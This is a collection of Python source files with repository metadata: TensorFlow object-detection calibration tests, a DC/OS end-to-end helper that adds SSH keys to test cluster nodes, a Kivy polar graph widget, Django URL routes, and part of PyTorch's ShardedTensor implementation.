# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3],
[0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8],
[0.9, 1.0, 1.0]]], dtype=tf.float32)
# Everything should map to 0.5 if classes are ignored.
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.05, 0.1, 0.15],
[0.2, 0.25, 0.0]],
[[0.35, 0.45, 0.55],
[0.65, 0.75, 0.75]]])
def test_multiclass_function_approximations(self):
"""Tests that calibration produces correct multiclass values."""
# Background class (0-index) maps all predictions to 0.5.
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
# Class id 1 will interpolate using these values.
class_1_x = np.asarray([0.0, 0.2, 1.0])
class_1_y = np.asarray([0.0, 0.6, 1.0])
self._add_function_approximation_to_calibration_proto(
calibration_config, class_1_x, class_1_y, class_id=1)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.6], [0.5, 0.3]],
[[0.5, 0.7], [0.5, 0.96]]])
def test_temperature_scaling(self):
"""Tests that calibration produces correct temperature scaling values."""
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 2.0
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8], [0.9, 1.0, 1.0]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np,
[[[0.05, 0.1, 0.15], [0.2, 0.25, 0.0]],
[[0.3, 0.35, 0.4], [0.45, 0.5, 0.5]]])
def test_temperature_scaling_incorrect_value_error(self):
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 0
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3]]], dtype=tf.float32)
with self.assertRaises(ValueError):
calibration_fn(class_predictions_with_background)
def test_skips_class_when_calibration_parameters_not_present(self):
"""Tests that graph fails when parameters not present for all classes."""
# Only adding calibration parameters for class id = 0, even though class id
# 1 is present in the data.
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
# batch_size = 2, num_classes = 2, num_anchors = 2.
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.2], [0.5, 0.1]],
[[0.5, 0.4], [0.5, 0.92]]])
if __name__ == '__main__':
tf.test.main()
| 44.179487
| 80
| 0.667054
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import interpolate
from six.moves import zip
import tensorflow as tf
from object_detection.builders import calibration_builder
from object_detection.protos import calibration_pb2
from object_detection.utils import test_case
class CalibrationBuilderTest(test_case.TestCase):
def test_tf_linear_interp1d_map(self):
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.5, 0.5, 0.5])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_map_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_map_outputs
tf_map_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_map_outputs_np, [0.5, 0.5, 0.5, 0.5, 0.5])
def test_tf_linear_interp1d_interpolate(self):
def graph_fn():
tf_x = tf.constant([0., 0.5, 1.])
tf_y = tf.constant([0.6, 0.7, 1.0])
new_x = tf.constant([0., 0.25, 0.5, 0.75, 1.])
tf_interpolate_outputs = calibration_builder._tf_linear_interp1d(
new_x, tf_x, tf_y)
return tf_interpolate_outputs
tf_interpolate_outputs_np = self.execute(graph_fn, [])
self.assertAllClose(tf_interpolate_outputs_np, [0.6, 0.65, 0.7, 0.85, 1.])
@staticmethod
def _get_scipy_interp1d(new_x, x, y):
interpolation1d_fn = interpolate.interp1d(x, y)
return interpolation1d_fn(new_x)
def _get_tf_interp1d(self, new_x, x, y):
def graph_fn():
tf_interp_outputs = calibration_builder._tf_linear_interp1d(
tf.convert_to_tensor(new_x, dtype=tf.float32),
tf.convert_to_tensor(x, dtype=tf.float32),
tf.convert_to_tensor(y, dtype=tf.float32))
return tf_interp_outputs
np_tf_interp_outputs = self.execute(graph_fn, [])
return np_tf_interp_outputs
def test_tf_linear_interp1d_against_scipy_map(self):
length = 10
np_x = np.linspace(0, 1, length)
np_y_map = np.repeat(0.5, length)
test_data_np = np.linspace(0, 1, length * 10)
scipy_map_outputs = self._get_scipy_interp1d(test_data_np, np_x, np_y_map)
np_tf_map_outputs = self._get_tf_interp1d(test_data_np, np_x, np_y_map)
self.assertAllClose(scipy_map_outputs, np_tf_map_outputs)
def test_tf_linear_interp1d_against_scipy_interpolate(self):
length = 10
np_x = np.linspace(0, 1, length)
np_y_interp = np.linspace(0.5, 1, length)
test_data_np = np.linspace(0, 1, length * 10)
scipy_interp_outputs = self._get_scipy_interp1d(test_data_np, np_x,
np_y_interp)
np_tf_interp_outputs = self._get_tf_interp1d(test_data_np, np_x,
np_y_interp)
self.assertAllClose(scipy_interp_outputs, np_tf_interp_outputs)
@staticmethod
def _add_function_approximation_to_calibration_proto(calibration_proto,
x_array, y_array,
class_id):
if class_id is not None:
function_approximation = (
calibration_proto.class_id_function_approximations
.class_id_xy_pairs_map[class_id])
else:
function_approximation = (
calibration_proto.function_approximation.x_y_pairs)
for x, y in zip(x_array, y_array):
x_y_pair_message = function_approximation.x_y_pair.add()
x_y_pair_message.x = x
x_y_pair_message.y = y
def test_class_agnostic_function_approximation(self):
class_agnostic_x = np.asarray([0.0, 0.5, 1.0])
class_agnostic_y = np.asarray([0.0, 0.25, 0.75])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_agnostic_x, class_agnostic_y, class_id=None)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3],
[0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8],
[0.9, 1.0, 1.0]]], dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.05, 0.1, 0.15],
[0.2, 0.25, 0.0]],
[[0.35, 0.45, 0.55],
[0.65, 0.75, 0.75]]])
def test_multiclass_function_approximations(self):
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
class_1_x = np.asarray([0.0, 0.2, 1.0])
class_1_y = np.asarray([0.0, 0.6, 1.0])
self._add_function_approximation_to_calibration_proto(
calibration_config, class_1_x, class_1_y, class_id=1)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.6], [0.5, 0.3]],
[[0.5, 0.7], [0.5, 0.96]]])
def test_temperature_scaling(self):
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 2.0
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.0]],
[[0.6, 0.7, 0.8], [0.9, 1.0, 1.0]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np,
[[[0.05, 0.1, 0.15], [0.2, 0.25, 0.0]],
[[0.3, 0.35, 0.4], [0.45, 0.5, 0.5]]])
def test_temperature_scaling_incorrect_value_error(self):
calibration_config = calibration_pb2.CalibrationConfig()
calibration_config.temperature_scaling_calibration.scaler = 0
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2, 0.3]]], dtype=tf.float32)
with self.assertRaises(ValueError):
calibration_fn(class_predictions_with_background)
def test_skips_class_when_calibration_parameters_not_present(self):
class_0_x = np.asarray([0.0, 0.5, 1.0])
class_0_y = np.asarray([0.5, 0.5, 0.5])
calibration_config = calibration_pb2.CalibrationConfig()
self._add_function_approximation_to_calibration_proto(
calibration_config, class_0_x, class_0_y, class_id=0)
def graph_fn():
calibration_fn = calibration_builder.build(calibration_config)
class_predictions_with_background = tf.constant(
[[[0.1, 0.2], [0.9, 0.1]],
[[0.6, 0.4], [0.08, 0.92]]],
dtype=tf.float32)
calibrated_scores = calibration_fn(class_predictions_with_background)
return calibrated_scores
calibrated_scores_np = self.execute(graph_fn, [])
self.assertAllClose(calibrated_scores_np, [[[0.5, 0.2], [0.5, 0.1]],
[[0.5, 0.4], [0.5, 0.92]]])
if __name__ == '__main__':
tf.test.main()
| true
| true
|
790b173432bf26c0008a0f7d958ea9da6255f9ea
| 814
|
py
|
Python
|
src/dcos_e2e_cli/common/credentials.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 63
|
2018-05-17T21:02:14.000Z
|
2021-11-15T19:18:03.000Z
|
src/dcos_e2e_cli/common/credentials.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 225
|
2017-09-08T02:24:58.000Z
|
2018-05-16T12:18:58.000Z
|
src/dcos_e2e_cli/common/credentials.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 21
|
2018-06-14T21:58:24.000Z
|
2021-11-15T19:18:06.000Z
|
"""
Credentials used when making CLIs.
"""
from pathlib import Path
from dcos_e2e.cluster import Cluster
DEFAULT_SUPERUSER_USERNAME = 'bootstrapuser'
DEFAULT_SUPERUSER_PASSWORD = 'deleteme'
def add_authorized_key(cluster: Cluster, public_key_path: Path) -> None:
"""
Add an authorized key to all nodes in the given cluster.
"""
nodes = {
*cluster.masters,
*cluster.agents,
*cluster.public_agents,
}
for node in nodes:
node.run(
args=['echo', '', '>>', '/root/.ssh/authorized_keys'],
shell=True,
)
node.run(
args=[
'echo',
public_key_path.read_text(),
'>>',
'/root/.ssh/authorized_keys',
],
shell=True,
)
| 22
| 72
| 0.540541
|
from pathlib import Path
from dcos_e2e.cluster import Cluster
DEFAULT_SUPERUSER_USERNAME = 'bootstrapuser'
DEFAULT_SUPERUSER_PASSWORD = 'deleteme'
def add_authorized_key(cluster: Cluster, public_key_path: Path) -> None:
nodes = {
*cluster.masters,
*cluster.agents,
*cluster.public_agents,
}
for node in nodes:
node.run(
args=['echo', '', '>>', '/root/.ssh/authorized_keys'],
shell=True,
)
node.run(
args=[
'echo',
public_key_path.read_text(),
'>>',
'/root/.ssh/authorized_keys',
],
shell=True,
)
| true
| true
|
790b1759dac2822a565da21263cc32769cb33853
| 2,698
|
py
|
Python
|
Exode/UI/polarGraph.py
|
RenatoTorres/Exode
|
fd7f6f51a04a88d404dcbed34acd5b8c2f54e54a
|
[
"Apache-2.0"
] | null | null | null |
Exode/UI/polarGraph.py
|
RenatoTorres/Exode
|
fd7f6f51a04a88d404dcbed34acd5b8c2f54e54a
|
[
"Apache-2.0"
] | 1
|
2018-08-09T23:45:01.000Z
|
2018-08-09T23:45:01.000Z
|
Exode/UI/polarGraph.py
|
RenatoTorres/Exode
|
fd7f6f51a04a88d404dcbed34acd5b8c2f54e54a
|
[
"Apache-2.0"
] | null | null | null |
from kivy.lang import Builder
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.graphics import *
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty
from .gardenGraph import Plot
from .ExdLabel import *
import math
class PolarGraph(Widget):
def __init__(self, radial_tick=4, linear_tick=10, scale=10, **kwargs):
self.bind(pos=self.draw,
size=self.draw)
self.tick_color= [0.51, 0.51, 0.51, 1]
self.plots= []
self.nb_radial_tick= radial_tick
self.nb_linear_tick= linear_tick
self.scale= scale
super(PolarGraph, self).__init__(**kwargs)
self.ratio= 1
if self.size_hint[0] != None:
self.ratio= self.size_hint[0]
def draw(self, *args):
self.canvas.clear()
if hasattr(self, "parent"):
self.ratio= min(self.parent.size_hint_x, self.parent.size_hint_y)
self.dim= min(self.width, self.height)
self.update_ticks(*args)
self.update_plots(*args)
def update_ticks(self, *args):
with self.canvas:
Color(*self.tick_color)
for i in range(1,self.nb_radial_tick+1):
Line(circle=(self.center_x,
self.center_y,
self.ratio*i*(self.height/self.nb_radial_tick)/2))
for i in range(1,self.nb_linear_tick+1):
tick_len = self.dim*self.ratio*.5
Line(points=[self.center_x-tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y-tick_len*math.sin(i*(3.14/self.nb_linear_tick)),
self.center_x+tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y+tick_len*math.sin(i*(3.14/self.nb_linear_tick))],
width=1)
def add_plot(self, plot):
if plot in self.plots:
return
plot.bind(on_clear_plot=self.draw)
self.update_plots()
self.plots.append(plot)
def update_plots(self, *args):
for plot in self.plots:
with self.canvas:
Color(plot.color)
for pt in plot.points:
t= pt[0]
a= math.radians(pt[1][0])
m= pt[1][1]
x= self.center_x + math.cos(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
y= self.center_y + math.sin(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
Rectangle(pos=(x,y), size=(2,2))
class polarPlot(Plot):
pass
| 31.372093
| 95
| 0.569311
|
from kivy.lang import Builder
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.graphics import *
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty
from .gardenGraph import Plot
from .ExdLabel import *
import math
class PolarGraph(Widget):
def __init__(self, radial_tick=4, linear_tick=10, scale=10, **kwargs):
self.bind(pos=self.draw,
size=self.draw)
self.tick_color= [0.51, 0.51, 0.51, 1]
self.plots= []
self.nb_radial_tick= radial_tick
self.nb_linear_tick= linear_tick
self.scale= scale
super(PolarGraph, self).__init__(**kwargs)
self.ratio= 1
if self.size_hint[0] != None:
self.ratio= self.size_hint[0]
def draw(self, *args):
self.canvas.clear()
if hasattr(self, "parent"):
self.ratio= min(self.parent.size_hint_x, self.parent.size_hint_y)
self.dim= min(self.width, self.height)
self.update_ticks(*args)
self.update_plots(*args)
def update_ticks(self, *args):
with self.canvas:
Color(*self.tick_color)
for i in range(1,self.nb_radial_tick+1):
Line(circle=(self.center_x,
self.center_y,
self.ratio*i*(self.height/self.nb_radial_tick)/2))
for i in range(1,self.nb_linear_tick+1):
tick_len = self.dim*self.ratio*.5
Line(points=[self.center_x-tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y-tick_len*math.sin(i*(3.14/self.nb_linear_tick)),
self.center_x+tick_len*math.cos(i*(3.14/self.nb_linear_tick)),
self.center_y+tick_len*math.sin(i*(3.14/self.nb_linear_tick))],
width=1)
def add_plot(self, plot):
if plot in self.plots:
return
plot.bind(on_clear_plot=self.draw)
self.update_plots()
self.plots.append(plot)
def update_plots(self, *args):
for plot in self.plots:
with self.canvas:
Color(plot.color)
for pt in plot.points:
t= pt[0]
a= math.radians(pt[1][0])
m= pt[1][1]
x= self.center_x + math.cos(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
y= self.center_y + math.sin(a)*min(1,m/self.scale)*(self.dim*self.ratio)*.5
Rectangle(pos=(x,y), size=(2,2))
class polarPlot(Plot):
pass
| true
| true
|
790b17823832d542e9f2d0aff12b5b79aa574df5
| 684
|
py
|
Python
|
wouso/interface/apps/files/cpanel_urls.py
|
AlexandruGhergut/wouso
|
f26244ff58ae626808ae8c58ccc93d21f9f2666f
|
[
"Apache-2.0"
] | 117
|
2015-01-02T18:07:33.000Z
|
2021-01-06T22:36:25.000Z
|
wouso/interface/apps/files/cpanel_urls.py
|
AlexandruGhergut/wouso
|
f26244ff58ae626808ae8c58ccc93d21f9f2666f
|
[
"Apache-2.0"
] | 229
|
2015-01-12T07:07:58.000Z
|
2019-10-12T08:27:01.000Z
|
wouso/interface/apps/files/cpanel_urls.py
|
AlexandruGhergut/wouso
|
f26244ff58ae626808ae8c58ccc93d21f9f2666f
|
[
"Apache-2.0"
] | 96
|
2015-01-07T05:26:09.000Z
|
2020-06-25T07:28:51.000Z
|
from django.conf.urls import patterns, url
urlpatterns = patterns('wouso.interface.apps.files.cpanel_views',
url(r'^$', 'files', name='files'),
url(r'^add_file/$', 'add_file', name='add_file'),
url(r'^edit_file/(?P<pk>\d+)/$', 'edit_file', name='edit_file'),
url(r'^delete_file/(?P<pk>\d+)/$', 'delete_file', name='delete_file'),
url(r'^manage_categories/$', 'manage_categories', name='manage_file_categories'),
url(r'^add_category/$', 'add_category', name='add_file_category'),
url(r'^edit_category/(?P<pk>\d+)/$', 'edit_category', name='edit_file_category'),
url(r'^delete_category/(?P<pk>\d+)/$', 'delete_category', name='delete_file_category'),
)
| 52.615385
| 91
| 0.663743
|
from django.conf.urls import patterns, url
urlpatterns = patterns('wouso.interface.apps.files.cpanel_views',
url(r'^$', 'files', name='files'),
url(r'^add_file/$', 'add_file', name='add_file'),
url(r'^edit_file/(?P<pk>\d+)/$', 'edit_file', name='edit_file'),
url(r'^delete_file/(?P<pk>\d+)/$', 'delete_file', name='delete_file'),
url(r'^manage_categories/$', 'manage_categories', name='manage_file_categories'),
url(r'^add_category/$', 'add_category', name='add_file_category'),
url(r'^edit_category/(?P<pk>\d+)/$', 'edit_category', name='edit_file_category'),
url(r'^delete_category/(?P<pk>\d+)/$', 'delete_category', name='delete_file_category'),
)
| true
| true
|
790b182fac02f2f5d7712f5ef02a0852c6baebfa
| 1,162
|
py
|
Python
|
ajax/urls.py
|
joestump/django-ajax
|
b71619d5c00d8e0bb990ddbea2c93cf303dc2c80
|
[
"BSD-3-Clause"
] | 62
|
2015-01-09T23:02:06.000Z
|
2020-12-27T19:44:58.000Z
|
ajax/urls.py
|
joestump/django-ajax
|
b71619d5c00d8e0bb990ddbea2c93cf303dc2c80
|
[
"BSD-3-Clause"
] | 7
|
2015-03-26T21:52:54.000Z
|
2016-06-20T20:53:43.000Z
|
ajax/urls.py
|
joestump/django-ajax
|
b71619d5c00d8e0bb990ddbea2c93cf303dc2c80
|
[
"BSD-3-Clause"
] | 12
|
2015-02-23T11:58:44.000Z
|
2020-10-26T22:32:58.000Z
|
from __future__ import absolute_import
from django.conf.urls import *
from django.views.static import serve
from ajax import views
import django
import os
JAVASCRIPT_PATH = "%s/js" % os.path.dirname(__file__)
if django.VERSION < (1, 8):
urlpatterns = patterns('ajax.views',
(r'^(?P<application>\w+)/(?P<model>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', 'endpoint_loader'),
(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
)
else:
urlpatterns = [
url(r'^(?P<application>\w+)/(?P<model>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', views.endpoint_loader),
url(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
]
| 44.692308
| 163
| 0.598967
|
from __future__ import absolute_import
from django.conf.urls import *
from django.views.static import serve
from ajax import views
import django
import os
JAVASCRIPT_PATH = "%s/js" % os.path.dirname(__file__)
if django.VERSION < (1, 8):
urlpatterns = patterns('ajax.views',
(r'^(?P<application>\w+)/(?P<model>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', 'endpoint_loader'),
(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', 'endpoint_loader'),
(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
)
else:
urlpatterns = [
url(r'^(?P<application>\w+)/(?P<model>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<method>\w+).json', views.endpoint_loader),
url(r'^(?P<application>\w+)/(?P<model>\w+)/(?P<pk>\d+)/(?P<method>\w+)/?(?P<taggit_command>(add|remove|set|clear|similar))?.json$', views.endpoint_loader),
url(r'^js/(?P<path>.*)$', serve,
{'document_root': JAVASCRIPT_PATH}),
]
| true
| true
|
790b18c838d2e1ac885c3773cd7a0f20395937c4
| 30,641
|
py
|
Python
|
torch/distributed/_sharded_tensor/api.py
|
steffenerickson/pytorch
|
0b656c4c69ce77ecd9aace486e471917e4660746
|
[
"Intel"
] | 1
|
2022-02-13T15:29:24.000Z
|
2022-02-13T15:29:24.000Z
|
torch/distributed/_sharded_tensor/api.py
|
steffenerickson/pytorch
|
0b656c4c69ce77ecd9aace486e471917e4660746
|
[
"Intel"
] | null | null | null |
torch/distributed/_sharded_tensor/api.py
|
steffenerickson/pytorch
|
0b656c4c69ce77ecd9aace486e471917e4660746
|
[
"Intel"
] | null | null | null |
from dataclasses import dataclass, field
from enum import Enum
from typing import (
Callable,
Dict,
List,
Optional,
Union
)
import weakref
import threading
import torch
import torch.distributed as dist
from torch.distributed import rpc
from torch.distributed import distributed_c10d
from torch.distributed._sharding_spec import (
ChunkShardingSpec,
EnumerableShardingSpec,
ShardMetadata,
ShardingSpec,
)
from torch.distributed._sharding_spec._internals import (
check_tensor,
get_split_size,
get_chunked_dim_size,
validate_non_overlapping_shards_metadata,
)
from torch.types import Number
from .metadata import TensorProperties, ShardedTensorMetadata
from .shard import Shard
from .utils import (
get_current_process_group,
_flatten_tensor_size,
_parse_and_validate_remote_device,
_validate_output_tensor_for_gather,
build_metadata_from_local_shards,
build_global_metadata
)
# Tracking for sharded tensor objects.
_sharded_tensor_lock = threading.Lock()
_sharded_tensor_current_id = 0
_sharded_tensor_map: Dict[int, 'weakref.ReferenceType[ShardedTensor]'] = {}
# Custom sharded ops
_SHARDED_OPS: Dict[str, Callable] = {}
def _register_sharded_op(op, func):
from inspect import signature
if len(signature(func).parameters) != 4:
raise TypeError(
f'Custom sharded op function expects signature: '
f'(types, args, kwargs, process_group), but received '
f'signature: {signature(func)}')
global _SHARDED_OPS
_SHARDED_OPS[op] = func
def _register_remote_shards(sharded_tensor_id: int, rrefs: List[rpc.RRef[Shard]], rpc_rank: int):
with _sharded_tensor_lock:
if sharded_tensor_id not in _sharded_tensor_map:
raise RuntimeError(
f'Could not find sharded_tensor_id: {sharded_tensor_id} in map: {_sharded_tensor_map.keys()}')
sharded_tensor = _sharded_tensor_map[sharded_tensor_id]()
if sharded_tensor is None:
raise RuntimeError('ShardedTensor weakref has been deallocated')
else:
sharded_tensor._register_remote_shards(rrefs, rpc_rank)
class CreateOp(Enum):
EMPTY = 0
FULL = 1
ONES = 2
RAND = 3
ZEROS = 4
@dataclass
class TensorInitParams(object):
""" Container for list of common params to create new local tensor. """
create_op: CreateOp
# needed when create_op is FULL
# default set to False (not None) since None is incompatible with Number.
fill_value: Number = field(default=False)
tensor_properties: TensorProperties = field(
default=TensorProperties(dtype=torch.get_default_dtype(),
layout=torch.strided,
requires_grad=False,
memory_format=torch.contiguous_format,
pin_memory=False))
class ShardedTensor(object):
"""
ShardedTensor is an abstraction to represent Tensors that are sharded
across multiple devices and multiple processes.
ShardedTensor is initialized in an SPMD like fashion where each rank
initializes the ShardedTensor. The ShardedTensor object on each rank
then only stores the local shard for the Tensor and provides global
metadata for all the shards.
ShardedTensor doesn't provide any Tensor like operations but is a wrapper
providing the Tensor representing the local shard and the global metadata.
Using these, users can build their custom distributed sharded computations
on top of this primitive. The local shards are all initialized using the
create_op specified by tensor_init_params.create_op, e.g., torch.ones, or
torch.empty
Args:
sharding_spec (:class:`torch.distributed._sharding_spec.ShardingSpec`): The specification
describing how to shard the Tensor.
size (int...): a sequence of integers defining the shape of the output
tensor. Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
tensor_init_params (:class: `TensorInitParams`): common params to create tensor.
init_rrefs (bool, optional): Whether or not to initialize
:class:`torch.distributed.rpc.RRef`s pointing to remote shards.
Need to initialize the RPC Framework if specified as ``True``.
Default: ``False``.
.. note:: ShardedTensor uses collectives to do various operations, i.e. it
uses all_gather to do cross rank validations. For NCCL-based processed
groups, internal tensor representations of objects must be moved to the
GPU device before communication takes place. In this case, the device
used is given by ``torch.cuda.current_device()`` and it is the user's
responsiblity to ensure that this is set so that each rank has an
individual GPU, via ``torch.cuda.set_device()``
"""
def __new__(cls, *args, **kwargs):
# Use __new__ for logging purposes.
torch._C._log_api_usage_once("torch.distributed.sharded_tensor")
return super(ShardedTensor, cls).__new__(cls)
def __init__(
self,
sharding_spec: ShardingSpec,
*size,
tensor_init_params: TensorInitParams,
process_group=None,
init_rrefs=False,
):
# prepare initialization, initialize fields like
# _process_group, _local_shards, etc.
self._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
if tensor_init_params.tensor_properties is None:
raise ValueError('tensor_properties must not be None.')
if tensor_init_params.tensor_properties.dtype is None:
tensor_init_params.tensor_properties.dtype = torch.get_default_dtype()
if tensor_init_params.tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
if tensor_init_params.tensor_properties.memory_format != torch.contiguous_format:
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
dims = _flatten_tensor_size(size)
self._sharding_spec = sharding_spec
if isinstance(self._sharding_spec, ChunkShardingSpec):
self._init_chunked(dims, tensor_init_params)
elif isinstance(self._sharding_spec, EnumerableShardingSpec):
self._init_enumerable(dims, tensor_init_params)
else:
raise ValueError(f'Unsupported sharding_spec: {self._sharding_spec}')
# do post initialization (i.e. register sharded_tensor_id, initialize_rpc)
self._post_init()
def _prepare_init(self, process_group=None, init_rrefs=False):
self._init_rrefs = init_rrefs
self._sharded_tensor_id = None
self._process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
self._local_shards: List[Shard] = []
self._remote_shards: Dict[int, List[rpc.RRef[Shard]]] = {}
def _post_init(self):
# Initialize RPC if available.
if self._init_rrefs:
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
self._sharded_tensor_id = _sharded_tensor_current_id
_sharded_tensor_map[self._sharded_tensor_id] = weakref.ref(self)
_sharded_tensor_current_id += 1
if not rpc._is_current_rpc_agent_set():
raise RuntimeError(
'RPC Framework needs to be initialized using'
' torch.distributed.rpc.init_rpc if init_rrefs is set to True')
self._init_rpc()
def __del__(self):
# Clean up the global map.
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
if self._sharded_tensor_id in _sharded_tensor_map:
_sharded_tensor_map.pop(self._sharded_tensor_id) # type: ignore[call-overload]
def _init_rpc(self):
# Validate PG and RPC ranks match.
pg_rank = dist.get_rank()
rpc_rank = rpc.get_worker_info().id
if pg_rank != rpc_rank:
raise ValueError(
f'Default ProcessGroup and RPC ranks must be '
f'the same for ShardedTensor, found process group rank: '
f'{pg_rank} and RPC rank: {rpc_rank}'
)
self._remote_shards = {}
# Gather all the sharded tensor ids.
worker_infos = rpc._get_current_rpc_agent().get_worker_infos()
rank_to_name = {}
name_to_rank = {}
for worker_info in worker_infos:
rank_to_name[worker_info.id] = worker_info.name
name_to_rank[worker_info.name] = worker_info.id
all_tensor_ids = rpc.api._all_gather(self._sharded_tensor_id)
# Share the local shards to the entire world.
futs = []
rpc_rank = rpc.get_worker_info().id
for rank in range(dist.get_world_size()):
# Skip self.
if rank == dist.get_rank():
continue
if len(self.local_shards()) != 0:
rrefs: List[rpc.RRef[Shard]] = [rpc.RRef(shard) for shard in self.local_shards()]
fut = rpc.rpc_async(
rank,
_register_remote_shards,
